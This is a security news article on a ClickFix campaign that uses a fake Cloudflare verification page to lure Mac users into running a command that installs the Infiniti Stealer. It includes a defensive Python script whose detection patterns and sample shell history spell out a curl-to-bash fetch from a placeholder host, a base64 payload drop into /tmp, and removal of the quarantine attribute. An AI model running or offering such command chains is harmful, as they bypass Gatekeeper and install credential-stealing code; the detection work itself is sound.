Cloudflare ClickFix Malware Attack Exposes Macs to Infiniti Stealer


Malware Researchers Document ClickFix Social-Engineering Technique Adapted to macOS

Malwarebytes researchers have documented a ClickFix campaign that uses a Cloudflare-themed human-verification page to distribute a Python-based information stealer targeting macOS users. ClickFix is a social-engineering technique rather than clickjacking: the victim is not tricked into clicking a hidden element, but talked into pasting and running a command themselves.

ClickFix Campaign Details

  • The attack begins with a fake CAPTCHA page that mimics Cloudflare's human-verification check and instructs the victim to paste a command into Terminal and run it.
  • The tactic relies on the victim's trust in the Cloudflare branding: the command is presented as a harmless verification step, so the victim executes it with their own privileges and no software exploit is needed.
  • The pasted command fetches a Bash script from a remote server. The script decodes an embedded payload, writes it to a temporary folder, removes the quarantine flag (the com.apple.quarantine extended attribute, so Gatekeeper does not inspect the file) and executes it.
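The three steps above leave a recognisable trail in the victim's shell history: a curl-to-shell fetch, a base64 decode into a temporary path, an xattr call that strips com.apple.quarantine, and an execution. The script below is an added triage example, not Malwarebytes' tooling and not the campaign's real command (the page does not reproduce it); it reads a zsh or bash history file, tags each command with the chain steps it matches, and correlates commands that occur within a short time window so that a chain split across several pasted lines is still caught. Indicator names, the 120-second window and every line in SAMPLE_HISTORY are constructed for illustration.

```python
"""Triage shell history for the ClickFix chain described above.

Added example, not Malwarebytes' tooling and not the campaign's actual command
(the page does not reproduce it). The indicators map onto the steps the article
lists: fetch a remote script, decode an embedded payload, drop it in a temporary
directory, strip the com.apple.quarantine attribute, mark it executable, run it.
Every history line in SAMPLE_HISTORY is constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# One regex per step of the chain; the names are labels chosen here, not vendor IDs.
INDICATORS: Dict[str, re.Pattern] = {
    "remote_fetch":     re.compile(r"\b(curl|wget)\b.*\bhttps?://", re.I),
    # "curl ... | bash" or the bash -c "$(curl ...)" form commonly pasted into Terminal
    "execute_remote":   re.compile(r"\|\s*(ba|z)?sh\b|\b(ba|z)?sh\s+-c\s+[\"']?\$\(", re.I),
    "decode_payload":   re.compile(r"\bbase64\b.*(-d|--decode)\b|\bopenssl\s+enc\b.*\s-d\b", re.I),
    "temp_drop":        re.compile(r"(/tmp/|/private/tmp/|\$TMPDIR|/var/folders/)", re.I),
    # xattr -d com.apple.quarantine <file>, xattr -rd ..., or xattr -c (clear all attributes)
    "quarantine_strip": re.compile(r"\bxattr\s+(-[a-z]*d[a-z]*\s+com\.apple\.quarantine|-[a-z]*c\b)", re.I),
    "make_executable":  re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b", re.I),
}

# zsh EXTENDED_HISTORY lines look like ": <epoch>:<elapsed>;<command>"; bash history is one command per line.
ZSH_EXT = re.compile(r"^: (?P<ts>\d+):\d+;(?P<cmd>.*)$")


@dataclass
class Entry:
    ts: Optional[int]      # epoch seconds when available, else None (plain bash history)
    cmd: str
    steps: frozenset       # names from INDICATORS that matched this command


def parse_history(text: str) -> List[Entry]:
    """Split a history file into entries and tag each with the chain steps it matches."""
    entries = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        m = ZSH_EXT.match(raw)
        ts, cmd = (int(m["ts"]), m["cmd"]) if m else (None, raw)
        steps = frozenset(name for name, rx in INDICATORS.items() if rx.search(cmd))
        entries.append(Entry(ts, cmd, steps))
    return entries


def rate(steps: frozenset) -> Optional[str]:
    """Stripping quarantine is rare in legitimate use, so it alone is 'high';
    curl-to-shell alone is only 'medium' because installers use it too."""
    if "quarantine_strip" in steps or len(steps) >= 3:
        return "high"
    if len(steps) == 2:
        return "medium"
    return None


def find_chains(entries: List[Entry], window: int = 120, min_steps: int = 4) -> List[dict]:
    """Correlate timestamped commands: union the steps of every tagged command within
    `window` seconds of the first, and report the group if it covers most of the chain."""
    chains, i = [], 0
    while i < len(entries):
        first = entries[i]
        if first.ts is None or not first.steps:
            i += 1
            continue
        group, last = [first], i
        for j in range(i + 1, len(entries)):
            nxt = entries[j]
            if nxt.ts is None or nxt.ts - first.ts > window:
                break
            if nxt.steps:
                group.append(nxt)
                last = j
        union = frozenset().union(*(e.steps for e in group))
        if len(union) >= min_steps:
            chains.append({"start": first.ts, "end": group[-1].ts,
                           "steps": sorted(union), "commands": [e.cmd for e in group]})
        i = last + 1
    return chains


def triage(text: str, window: int = 120) -> Tuple[List[dict], List[dict]]:
    """Return (per-command findings, correlated chains) for a history file's contents."""
    entries = parse_history(text)
    findings = [{"cmd": e.cmd, "steps": sorted(e.steps), "rating": rate(e.steps)}
                for e in entries if rate(e.steps)]
    return findings, find_chains(entries, window)


# Constructed zsh history: one older curl-to-shell install, then a ClickFix-style
# paste split over two lines, surrounded by benign commands.
SAMPLE_HISTORY = """\
: 1712340000:0;bash -c "$(curl -fsSL https://example.invalid/install.sh)"
: 1712345600:0;ls -la ~/Downloads
: 1712345610:0;curl -fsSL https://example.invalid/verify.sh | bash
: 1712345611:0;echo 'aGVsbG8=' | base64 -d > /tmp/.app && xattr -d com.apple.quarantine /tmp/.app && chmod +x /tmp/.app && /tmp/.app
: 1712345700:0;git status
: 1712345710:0;xattr -l ~/Downloads/report.pdf
"""

if __name__ == "__main__":
    found, chained = triage(SAMPLE_HISTORY)
    for f in found:
        print(f"[{f['rating']}] {f['cmd']}  <- {', '.join(f['steps'])}")
    for c in chained:
        print(f"chain {c['start']}..{c['end']}: {len(c['commands'])} commands cover {len(c['steps'])} steps")
```

Point `triage()` at the contents of `~/.zsh_history` (zsh is the default macOS shell) or `~/.bash_history` to run it on a real host. Two caveats: a lone curl-to-shell line is noisy, since legitimate installers use the same pattern, which is why it only rates "medium" until combined with decoding or quarantine stripping; and shell history is an easily cleared, opt-in artifact, so on managed fleets the same indicators belong in process-execution telemetry from an EDR rather than in a history file.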

Infiniti Stealer Malware

The final payload is the Infiniti Stealer malware, a Python-based information stealer that targets:

  • Browser credentials
  • Keychain information
  • Cryptocurrency wallets
  • Secrets stored in developer files
  • Screenshots captured during execution

Attack Mechanism

According to Malwarebytes, “The malware sends the collected data to a Command and Control (C2) server via HTTP POST requests. After completing the operation, the malware sends a notification to a Telegram channel and queues captured credentials to be cracked on the server.”

Evading Detection

The Infiniti Stealer employs randomized execution delays and checks whether the host is a known analysis environment before proceeding, to evade sandboxes and automated detection.

Implications

Malwarebytes notes that Infiniti Stealer demonstrates how techniques first used against Windows systems, such as ClickFix, are now being adapted to target Mac users. Compiling the Python stealer into a native binary, rather than shipping it as a plain script, makes the malware harder to detect and analyze.

As this approach becomes more prevalent, further adaptations are likely. Because ClickFix exploits no software vulnerability, keeping systems patched does not stop it on its own; the effective defence is never to paste commands from a web page into Terminal, backed by endpoint monitoring for curl-to-shell execution and removal of the com.apple.quarantine attribute.
